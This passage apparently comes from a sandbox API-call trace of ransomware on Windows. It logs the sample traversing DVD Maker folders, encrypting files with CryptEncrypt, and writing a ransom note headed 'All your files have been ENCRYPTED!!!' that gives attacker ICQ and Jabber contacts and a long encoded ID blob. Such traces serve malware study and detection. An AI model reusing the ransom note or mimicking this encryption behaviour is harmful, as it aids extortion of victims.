lpString2="#Decrypt#.txt") returned 1 [0251.680] lstrcmpW (lpString1="whitemenu.png", lpString2="_uninstalling_.png") returned 1 [0251.680] lstrlenW (lpString=".testttjffg") returned 11 [0251.680] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\whitemenu.png", lpSrch=".testttjffg") returned 0x0 [0251.680] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.680] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.680] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\whitemenu.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\whitemenu.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.680] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x700c6173, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x700c6173, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4e53996b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2ee8, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="whitemenu.png", cAlternateFileName="")) returned 0 [0251.680] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0251.681] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\#Decrypt#.txt") returned 73 [0251.681] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\#Decrypt#.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0251.683] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0251.683] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0251.684] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0251.684] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0251.685] CloseHandle (hObject=0x158) returned 1 [0251.685] GetProcessHeap () returned 0x780000 [0251.685] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0251.685] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa15a10e8, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa89306e, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa198102e, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Pets", cAlternateFileName="")) returned 1 [0251.685] lstrcmpiW (lpString1="Pets", lpString2="Windows") returned -1 [0251.685] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets") returned 52 [0251.685] lstrcmpW (lpString1="Pets", lpString2=".") returned 1 [0251.685] lstrcmpW (lpString1="Pets", lpString2="..") returned 1 [0251.685] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0251.685] GetProcessHeap () returned 0x780000 [0251.685] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0251.685] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\*") returned 54 [0251.685] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa15a10e8, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa89306e, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa198102e, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0251.688] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0251.688] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\.") returned 54 [0251.688] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0251.688] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa15a10e8, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa89306e, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa198102e, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="..", cAlternateFileName="")) returned 1 [0251.688] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0251.688] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\..") returned 55 [0251.688] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0251.688] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0251.688] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72003fbd, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72003fbd, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4e55fac9, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x39eaa, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Notes_INTRO_BG.wmv", cAlternateFileName="")) returned 1 [0251.688] lstrcmpiW (lpString1="Notes_INTRO_BG.wmv", lpString2="Windows") returned -1 [0251.688] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_INTRO_BG.wmv") returned 71 [0251.688] StrStrIW (lpFirst="Notes_INTRO_BG.wmv", lpSrch=".horseleader") returned 0x0 [0251.688] lstrcmpW (lpString1="Notes_INTRO_BG.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.688] lstrcmpW (lpString1="Notes_INTRO_BG.wmv", lpString2="_uninstalling_.png") returned 1 [0251.688] lstrlenW (lpString=".testttjffg") returned 11 [0251.688] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_INTRO_BG.wmv", lpSrch=".testttjffg") returned 0x0 [0251.688] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.688] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.689] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_INTRO_BG.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\notes_intro_bg.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.689] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72050277, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72050277, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4e55fac9, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x3dd24, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Notes_INTRO_BG_PAL.wmv", cAlternateFileName="")) returned 1 [0251.689] lstrcmpiW (lpString1="Notes_INTRO_BG_PAL.wmv", lpString2="Windows") returned -1 [0251.689] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_INTRO_BG_PAL.wmv") returned 75 [0251.689] StrStrIW (lpFirst="Notes_INTRO_BG_PAL.wmv", lpSrch=".horseleader") returned 0x0 [0251.689] lstrcmpW (lpString1="Notes_INTRO_BG_PAL.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.689] lstrcmpW (lpString1="Notes_INTRO_BG_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0251.689] lstrlenW (lpString=".testttjffg") returned 11 [0251.689] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_INTRO_BG_PAL.wmv", lpSrch=".testttjffg") returned 0x0 [0251.689] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.689] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.689] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_INTRO_BG_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\notes_intro_bg_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.690] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x720763d4, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x720763d4, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4e5d1ee3, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc0b4a, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Notes_LOOP_BG.wmv", cAlternateFileName="")) returned 1 [0251.690] lstrcmpiW (lpString1="Notes_LOOP_BG.wmv", lpString2="Windows") returned -1 [0251.690] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_LOOP_BG.wmv") returned 70 [0251.690] StrStrIW (lpFirst="Notes_LOOP_BG.wmv", lpSrch=".horseleader") returned 0x0 [0251.690] lstrcmpW (lpString1="Notes_LOOP_BG.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.690] lstrcmpW (lpString1="Notes_LOOP_BG.wmv", lpString2="_uninstalling_.png") returned 1 [0251.690] lstrlenW (lpString=".testttjffg") returned 11 [0251.690] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_LOOP_BG.wmv", lpSrch=".testttjffg") returned 0x0 [0251.690] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.691] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.691] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_LOOP_BG.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\notes_loop_bg.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.691] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7210e948, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7210e948, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4e61e19f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xd43ca, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Notes_LOOP_BG_PAL.wmv", cAlternateFileName="")) returned 1 [0251.691] lstrcmpiW (lpString1="Notes_LOOP_BG_PAL.wmv", lpString2="Windows") returned -1 [0251.691] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_LOOP_BG_PAL.wmv") returned 74 [0251.691] StrStrIW (lpFirst="Notes_LOOP_BG_PAL.wmv", lpSrch=".horseleader") returned 0x0 [0251.691] lstrcmpW (lpString1="Notes_LOOP_BG_PAL.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.691] lstrcmpW (lpString1="Notes_LOOP_BG_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0251.691] lstrlenW (lpString=".testttjffg") returned 11 [0251.691] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_LOOP_BG_PAL.wmv", lpSrch=".testttjffg") returned 0x0 [0251.691] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.691] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.691] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_LOOP_BG_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\notes_loop_bg_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.691] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7240848c, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7240848c, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4e66a45b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xbc8, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Pets_btn-back-over-select.png", cAlternateFileName="")) returned 1 [0251.692] lstrcmpiW (lpString1="Pets_btn-back-over-select.png", lpString2="Windows") returned -1 [0251.692] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-back-over-select.png") returned 82 [0251.692] StrStrIW (lpFirst="Pets_btn-back-over-select.png", lpSrch=".horseleader") returned 0x0 [0251.692] lstrcmpW (lpString1="Pets_btn-back-over-select.png", lpString2="#Decrypt#.txt") returned 1 [0251.692] lstrcmpW (lpString1="Pets_btn-back-over-select.png", lpString2="_uninstalling_.png") returned 1 [0251.692] lstrlenW (lpString=".testttjffg") returned 11 [0251.692] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-back-over-select.png", lpSrch=".testttjffg") returned 0x0 [0251.692] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.692] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.692] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-back-over-select.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_btn-back-over-select.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.693] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7242e5e9, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7242e5e9, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4e66a45b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x739, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Pets_btn-back-static.png", cAlternateFileName="")) returned 1 [0251.693] lstrcmpiW (lpString1="Pets_btn-back-static.png", lpString2="Windows") returned -1 [0251.693] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-back-static.png") returned 77 [0251.693] StrStrIW (lpFirst="Pets_btn-back-static.png", lpSrch=".horseleader") returned 0x0 [0251.693] lstrcmpW (lpString1="Pets_btn-back-static.png", lpString2="#Decrypt#.txt") returned 1 [0251.693] lstrcmpW (lpString1="Pets_btn-back-static.png", lpString2="_uninstalling_.png") returned 1 [0251.693] lstrlenW (lpString=".testttjffg") returned 11 [0251.693] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-back-static.png", lpSrch=".testttjffg") returned 0x0 [0251.693] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.693] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.693] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-back-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_btn-back-static.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.693] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72454746, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72454746, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4e6905b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xbc8, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Pets_btn-next-over-select.png", cAlternateFileName="")) returned 1 [0251.694] lstrcmpiW (lpString1="Pets_btn-next-over-select.png", lpString2="Windows") returned -1 [0251.694] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-next-over-select.png") returned 82 [0251.694] StrStrIW (lpFirst="Pets_btn-next-over-select.png", lpSrch=".horseleader") returned 0x0 [0251.694] lstrcmpW (lpString1="Pets_btn-next-over-select.png", lpString2="#Decrypt#.txt") returned 1 [0251.694] lstrcmpW (lpString1="Pets_btn-next-over-select.png", lpString2="_uninstalling_.png") returned 1 [0251.694] lstrlenW (lpString=".testttjffg") returned 11 [0251.694] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-next-over-select.png", lpSrch=".testttjffg") returned 0x0 [0251.694] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.694] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.694] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-next-over-select.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_btn-next-over-select.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.694] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7247a8a3, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7247a8a3, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4e6905b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x7f9, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Pets_btn-next-static.png", cAlternateFileName="")) returned 1 [0251.694] lstrcmpiW (lpString1="Pets_btn-next-static.png", lpString2="Windows") returned -1 [0251.694] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-next-static.png") returned 77 [0251.694] StrStrIW (lpFirst="Pets_btn-next-static.png", lpSrch=".horseleader") returned 0x0 [0251.694] lstrcmpW (lpString1="Pets_btn-next-static.png", lpString2="#Decrypt#.txt") returned 1 [0251.694] lstrcmpW (lpString1="Pets_btn-next-static.png", lpString2="_uninstalling_.png") returned 1 [0251.694] lstrlenW (lpString=".testttjffg") returned 11 [0251.694] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-next-static.png", lpSrch=".testttjffg") returned 0x0 